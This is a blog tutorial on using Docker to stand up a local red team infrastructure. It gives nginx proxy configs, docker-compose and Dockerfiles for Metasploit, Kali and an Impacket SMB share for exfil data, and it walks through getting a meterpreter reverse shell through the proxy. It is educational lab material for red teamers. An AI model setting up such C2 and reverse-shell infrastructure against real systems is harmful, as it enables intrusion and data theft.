A N00b’s Perspective on Red Teaming: Dockerizing your Red Team Infrastructure

Christian Sanchez
16 min readAug 26, 2021

--

I’ve learned a lot since I started shadowing some talented red teamers. During that time, I learned how to build, rebuild, and tear down an infrastructure quickly with the use of Docker. Docker provides the ability to automate the build process with one or two commands once you have your initial build configured and setup. This is a really important part of red teaming, especially when your command-and-control infrastructure (C2) or your proxy server gets compromised, detected, or blocked. You need the ability to be able to spin up and tear down all of the key components as quickly as possible.

In this post, I will go over my automated Docker build and explain my thought process. I still have a lot to learn about Docker, but this blog post will cover some of the basics for using Docker as part of a red team

Docker versus virtual machines

Docker is a virtualization tool. However, it is not like Virtual Box, Proxmox, Hypervisor, or VMware Workstation. It’s a little bit more complex than that. It works at the OS level but shares the same hardware resources as the host. With a virtual machine (VM), all of the hardware is isolated and the VM runs as if it is its own separate computer. Docker uses a daemon which talks to the OS kernel and creates Linux namespaces called containers. Within those containers, Docker can use the minimum requirements to spin up a “virtualized” Linux host. Furthermore, Docker does very little to isolate itself from the host and talks directly to the OS kernel, permitting Docker to share the same exact resources as the host. A Virtual Machine does the opposite by isolating itself as much as possible from the OS kernel and hardware.

So, are virtual machines safer or more secure? The short answer is yes and no. The big difference between Docker and a Virtual Machine is portability. You can spin up a container within a matter of seconds with one command. This makes it easier and faster to spin up applications. So, if you separate everything correctly, with the right permissions, there shouldn’t be much of an issue. Remember you need to be able to tear down and rebuild your infrastructure quickly, so you wouldn’t want to run a bunch of services on a single container anyways. However, if there is an exploit on the application running within your Docker container or you’re running a vulnerable version of Docker…well…feels bad, bro…it’s most likely the attackers are not only pwning your application they are also pwning the host.

Setting up Docker

Now that I have provided a brief description of what Docker is and what it can do, let’s try building a local red team infrastructure. First things first, I need to install the Docker engine. There are numerous ways to install it. In Ubuntu, you can install it with “apt install docker.io”. Mac has a client you can get directly from Docker’s site. There is also the “opensource” version of Docker called Docker-CE, which pretty much runs the same and you won’t really see any relevant differences. To install it just follow the directions on Docker’s site, here. As for Windows, you can download a binary version of the engine as well.

Understanding the local infrastructure

Docker has the ability to spin up a virtual host and automate the commands you want to execute. Furthermore, you can automate and install the applications you want rather quickly. If you want to spin up multiple applications, you can automate this process with a combination of Dockerfiles and a docker-compose file. I will explain how Docker uses the two files in the next section.

The following diagram will be the build that I will be creating and walking through.

Our host will be serving five Docker containers with an Nginx container which will be the only externally accessible container. This container will be a proxy to our other containers. The proxy will forward traffic based on the URI path given. For example, if I wanted our Nginx server to forward traffic to our C2, in this case a container running Metasploit, I would use http://<ourservermachine>:<port>/msf. This will be configured by creating a custom nginx.conf file.

Proxy it up!

Let’s start by creating the files I need, starting with the nginx.conf file. The configuration file should specify the port our web server will be listening on and a URI. The URI will tell the web server if a visitor visits this page/URI forwards the traffic to our C2 listener, which in this case is another Docker container. That code should look like this:

worker_processes 1;events { worker_connections 1024; }http {
sendfile on;
server {
listen 80;
location /msf {

}
}
}

The worker process should be set to how many cores I want to utilize for the web server. One core should be okay because I don’t expect a lot of traffic hitting that URI. More information about the different settings you can use for your configuration file can be found here: http://nginx.org/en/docs/ngx_core_module.html#worker_processes.

The “events” context tells the web server how to handle connections. In this case I am allowing 1024 connections to be handled by a single worker process. By enabling the sendfile directive, we are speeding up the transmission of files by copying the entirety of specific files, rather than processing it when it’s requested. The Nginx instance will create an HTTP server listening on port 80. A URI location will be created, in this case “/msf”. When creating our Metasploit payload later, this is the URI we will be using to direct our traffic to the C2 via the proxy server.

Now that all the basic functions for the webserver are setup, the next thing is to set up the proxy forwarding to Metasploit container.

worker_processes 1;events { worker_connections 1024; }http {
sendfile on;
server {
listen 80;
location /msf {
proxy_pass http://msf:80;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Host $server_name;
}
}
}

The “proxy_pass” will pass any traffic that hits the “/msf” URI to our C2 container, which is also listening on port 80. The container will also be called “msf” (I will explain that once I start creating our docker-compose file). Since the traffic is not really being forwarded to another host, but rather a local container, the “proxy_redirect” can be disabled. As for the header, we are going to add additional information: “X-Real-IP”, “X-Forwarder-For”, and “X-Forwarded-Host”. Setting the “X-Real-IP” to “remote_address”, “X-Fowarded-For” to “proxy_add_x_forwardrd_for” and “X-Fowarded-Host” to “server-name”.

A GET request to the Nginx instance should look something like this:

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: evilwebsite[.]com
X-Real-IP: victim-ip-here
X-Forwarded-Host: evilwebsite
User-Agent: Firefox

Normally, I would redirect the requests to a reputation host, which is a legitimate website I want to show visitors when they browse to the host.

Think of a reputation host like a speakeasy back during the prohibition times. There is a legitimate business, like a grocery store, barber shop, etc. However, if you knock on a specific door within that business and say a “magic word” someone will grant you access to something else underneath it all. If I set the headers like this in a real red team engagement, I would get got! But for this exercise, we are setting up our infrastructure locally, so having Nginx set these headers will allow us to see how traffic is being sent and will be useful for troubleshooting. I will explain how to setup all of this up using real hosts within a Digital Ocean environment on my next blog post.

Now that we have our nginx.conf setup, let’s change gears and setup the docker-compose file.

Docker-compose and Dockerfile

With docker-compose I can create multiple containers, each using different applications. A docker-compose file will provide Docker a set of instructions for it to perform during build the process. Let’s say that I want Docker to open ports, share a specific file, create a shared folder/volume, and install multiple programs. Now let’s say I want to perform the same actions on multiple containers. Or even better, what if I want to install different services on each container, open different ports, and use a different OS for each of instance? A docker-compose file will make this possible and will automate that process for us.

In the following docker-compose file, I created five different containers. One container will have our proxy using nginx. I will call that container “proxy”. The second will be using a Metasploit-Framework image. This one I will call “msf”. The third container, called “kali”, will be running a Kali-Linux image. I created an extra container to share files between all the containers quickly, this is named “files”. The fifth and final container will be running Impacket for quick file sharing via SMB. The could be used for transferring files on to a victim host or uploading exfil data.

version: "3.3"
services:
proxy:
image: nginx:latest
container_name: proxy
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
ports:
- 0.0.0.0:80:80/tcp
msf:
image: metasploitframework/metasploit-framework:latest
container_name: msf
tty: true
stdin_open: true
volumes:
- ./scratch:/tmp/
- share:/share/
kali:
build: ./images/kali/
volumes:
- ./scratch/:/scratch
tty: true
stdin_open: true
files:
container_name: files
image: python:3
working_dir: /share/
volumes:
- share:/share/
impacket:
container_name: impacket
build: ./images/impacket
working_dir: /share
command: smbserver.py -smbsupport share /share
ports:
- 0.0.0.0:445:445/tcp
volumes:
- share:/share
volumes:
share: {}

Since I will be relying on a proxy to forward our traffic to Metasploit, I will just need port 80 to be open on our Nginx container. This means when I setup the C2 listener, it needs to be listening on the same port. However, I will get to that later.

As I mentioned earlier, Docker uses our host resources to run a lightweight version of a Linux operating system, including our hard drive space. I can share files and folders on our host machine then share it to the container. This can be done by using built-in Docker function called “volume”. For us to do this, I will need to create a folder called “scratch” on our host machine which will be shared to the “share” folder within the container. The folder will be shared with the kali and msf containers.

For the Impacket container, I will be using this container specifically to share files back and forth to external hosts. This container will allow us to share files quickly if I need to download a binary file or upload files I exfil from a host. To get this to work, I will need to pull a Python version 3 image, set container’s “working directory” to “/share”. This container, I will call “files”, and will be referenced in the nginx.conf. At the bottom of the docker-compose you can see I will be mounting a volume, called “share”. The volume will be shared across all the containers. Once the image has been built, the docker-compose file will instruct Docker to run a command to automatically start the SMB server.

A Dockerfile provides the ability to automate a series of commands I want to execute within the container during build time, making our builds a bit more complex. For example, I would like to use the latest Kali-Linux image, install the top 10 Kali tools using apt; then install additional programs which might be useful during an engagement. Furthermore, I could also execute pretty much any shell command, allowing me to perform actions like executing scripts, adding users, creating folders, etc.

The Dockerfile for our impacket image will be pulling the latest Python image (a barebones version of Linux running Python) and will install Impacket using pip.

FROM python:latestRUN set -x \
&& pip install impacket \
&& echo '[+] Done'
CMD ["/bin/bash"]

At this point, I also need to update our proxy’s nginx.conf. I will name the URI path /share”. The updated nginx.conf should look now look like this:

worker_processes 1;events { worker_connections 1024; }http {
sendfile on;
server {
listen 80;
location /msf {
proxy_pass http://msf:80/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Host $server_name;
}

location /share {
proxy_pass http://files:80/;
proxy_redirect off;
}
}
}

The following Dockerfile shows the shell commands I want execute for the Kali Docker container during build time. The following code will tell Docker to pull the latest image version of Kali from Docker’s official repository. Once downloaded, it will then run apt update then install several programs.

FROM kalilinux/kali-rolling:latestRUN set -x \ 
&& echo '[+]Updating Kali' \
&& DEBIAN_FRONTEND='noninteractive' apt update -qy \
&& echo '[+] Done'
RUN set -x \
&& echo '[+]Installing Tools' \
&& DEBIAN_FRONTEND='noninteractive' apt install kali-tools-top10 -qy \
openssh-server \
tmux \
dirbuster \
gobuster \
python3-pip \
&& echo '[+] Done'
CMD ["/bin/bash"]

Now let’s save both Dockerfiles under a folder called “images” within our main build folder. At this point our build folder structure should look something like this:

├── docker-compose.yml
├── docker_build
├── images/
│ ├── impacket/
│ │ └── Dockerfile
│ └── kali/
│ └── Dockerfile
├── nginx.conf
└── scratch/

I have everything I need for a basic infrastructure. This build allows me to transfer and share files, creates a C2 server, and sets up a proxy. Now to test it out!

Testing out the infrastructure

I can start the build process by running docker-compose up –d --build. The -d flag will run the containers in “detached” mode. This will make docker run the containers in the background without shutting them down. If I want to shut down the containers, I can do so by simply executing the docker-compose down -v command. The -v flag after down will remove any volumes I am sharing with our host and the containers.

Now the build process takes a couple of minutes, but at this point I can sip some coffee and wait.

Docker build process
docker-compose has finished the build process. The containers are up and running.

Once everything has completed, I can see what docker containers are running on our host by executing the command docker ps .

Executing “docker ps” will show you all of the containers running on the host

Great! Looks like everything all my containers are up and running. If I browse to our IP, I should see a Nginx message.

A 404 shows that the webserver is up

I got a 404 error from nginx. This means our web server is working. This index page is where I would normally have the proxy forward my traffic to a reputation host. However, I will not be setting a reputation host in this example.

Now I need to test out our proxy and make sure that our traffic is being forwarded to our C2 correctly. But first I need to create a msfvenom payload to test.

I will be creating a stageless python/meterpreter_reverse_tcp which will be pointing to my main host’s IP. The payload, once executed, will reach out to our Docker container running nginx. The nginx instance will be listening and waiting for a request to be made to the “/msf” URI path. Once a request has been made to that URI, it will forward the traffic to our C2 container, providing us a shell.

I can create the payload within the container itself. You can get a shell on the container by executing docker run -ti msf /bin/bash. The -ti will provide us an interactive TTY shell using bash.

Accessing the msf container.

This is a great opportunity to see if files are being shared on all containers. Let’s back out of the Metasploit container by pressing ctrl+ p + q. By pressing the key combination, I can back out of the container and have it run in the background without tearing it down.

Now let’s jump into our Kali-Linux container to check if our files are being shared. I will create a payload within the Kali instance and create it in the “/share” folder then log into our “files” container to see if it shows up there as well.

I can attach to our Kali container by running the docker attach msf command. In our “files” container, the current running process is a Python server. If I attached to the container, it would attach us into a process where I can’t really do much, unless I stop the Python server. I need it to provide me an interactive TTY shell, I can execute the same command I ran earlier, when I attached to the Metasploit container, docker exec -it files /bin/bash .

Creating a stageless python meterpreter payload using msfvenom.

Great! Anything I create in one container will be shared on all other containers except the proxy. I will now test to see if impacket server is working. I can use smbclient to check this quickly from our Kali instance by executing smbclient -L <hostip> --no-pass, which will list all the directories being shared by the remote host.

Testing SMB using smbclient to list out the share directories

To connect and access the share we can execute smbclient \\\\<hostip>\\SHARE .

At this point, everything is working great. Now to test the C2!

Getting Shell

Now that I have created the payload and tested the infrastructure folder share, let’s attempt to get a call back to our C2 container using the payload I created earlier.

Let’s setup the listener by attaching to our msf container using the Docker attachcommand. This will bring us into the Metasploit console.

For the listener, I will be using a multi/handler and will setting the payload to python/meterpreter_reverse_http. Remember I used a stageless payload, so the full payload will be executed on the victim host. The listener will be listening on all interfaces or 0.0.0.0. Using 0.0.0.0 bypasses any problems we might get by using a loopback address or using our host’s IP or hostname. Since the proxy will be forwarding anything that hits the URI path /msf on port 80, we should mimic those settings here as well by setting the LURI and LPORT.

Setting up a listener in msfconsole

Now that the listener is up and running let’s run the payload from our Kali instance to test it.

The payload failed to call back to the C2.

Well…it looks like executing the payload didn’t do anything. Let’s do some troubleshooting to figure out where exactly things are failing.

Troubleshooting

After not seeing any activity on my C2 server, I need to start testing communication between each component to figure out where the traffic is failing to be forwarded. Starting from the “victim” machine to proxy. The first question that runs through my mind is, “does my payload talk to the proxy server?”. If not, “is my proxy server up or is there anything wrong with my payload?”. If my traffic is hitting my proxy server, “is my proxy server forwarding traffic to my C2?”

Let’s check the communication from our test “victim” host to the proxy server by simply running a basic curl command and add the verbose flag with it.

Testing the connection between victim and proxy server.

It looks like the server is up and our “victim” host can talk to it just fine. This was verified by sending a request to http://<hostip>:80/. The fact that the server is responding with a 404 is good. This shows that the server is accepting requests, even though it can’t find the page.

Now, let’s check the server logs to see what could be happening at the proxy. If you log in to the “proxy” container and look at the Nginx log folder under /var/log/nginx/. You will notice that the files are symbolically linked to /dev/stdout and /dev/stderr. This means that the logs are being pushed directly to Docker’s standard output and standard error logs.

The logs within the Nginx contianer are forwarded directly to Docker’s logs.

This means I can just run a docker command to see application’s logs. This can be done by executing docker logs <container> command. Now let’s run the curl command again but this time sending a GET request to the URI path which would normally be forwarded to our C2 server. Then I can check the logs to see if I can pinpoint what’s happening with the traffic from the proxy to C2 container.

Let’s check the response from the curl command, this time to http://<hostip>:80/msf. Based on the proxy’s response, it seems like the proxy doesn’t know how to forward traffic, thus giving us a “Bad Gateway” error. Also, if you look back at the screenshot when I attempted to run the payload initially, you can see that Metasploit wasn’t receiving the traffic at all, this means the traffic is stopping at the proxy.

Traffic is not being forward to the MSF container.

Looking at the logs, it looks like the connection is cut when attempting to send the traffic to the upstream. This confirms that the issue is at the proxy.

The logs shows that traffic is being closed prematurely.

This means I must look back at our nginx.conf. There seems to be an issue there.

After analyzing the configuration file. I noticed a very small issue in the “proxy_pass” parameter.

location /msf {
proxy_pass http://msf:80;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Host $server_name;
}

Looking at the “proxy_pass” parameter, you can see that a URI was not provided. This means that the GET request hits our proxy server and attempts to forward the traffic to the upstream host, which is our Metasploit container in this instance. However, since there is no URI path provided, it attempts to send the traffic to http://msf:80/. However, our exploit handler is listening at msf. When nginx forwards traffic to http://msf:80 there is nothing there and it cuts the connection.

The updated and correct configuration should look like this:

server {
listen 80;
location /msf {
proxy_pass http://msf:80/msf;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Host $server_name;
}

Now, I have to applythe changes. Let’s start by tearing down the containers by executing the docker-compose down -v command. To be safe, let’s rebuild the containers by providing the--buildargument for docker-compose. This will provide us with a fresh build. The full command will be docker-compose up -d --build.

Once the containers are back up, I will need to recreate the payload and setup the listener again. I will then attempt to execute the payload one more time.

Getting shell…again

Getting shell…finally!

Finally! I got my infrastructure working and I can forward traffic to my C2 server! I have successfully created a simple local infrastructure. On my next post, I will be setting up a similar infrastructure, however, I will be automating it using Terraform and I will be creating the hosts in Digital Ocean. This will allow us to test our payloads over the internet, giving us more of a real operation feeling. Nonetheless, I hope you enjoyed learning about Docker and setting up your own local C2 infrastructure!

--

--

Christian Sanchez
Christian Sanchez

Written by Christian Sanchez

I love learning new things. My posts are my own and do not represent my employer.

No responses yet